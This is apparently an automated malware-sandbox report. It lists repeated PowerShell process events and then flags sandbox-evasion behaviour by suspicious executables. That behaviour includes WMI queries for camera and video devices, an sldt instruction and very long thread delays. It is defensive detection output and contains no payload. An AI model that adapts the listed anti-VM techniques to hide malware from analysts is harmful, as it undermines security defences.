                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeMemory allocated: 730000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeMemory allocated: 1A590000 memory reserve | memory write watchJump to behavior
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeMemory allocated: 9C0000 memory reserve | memory write watch
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeMemory allocated: 1A540000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeCode function: 8_2_00007FFD9BAA8180 sldt word ptr [eax]8_2_00007FFD9BAA8180
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
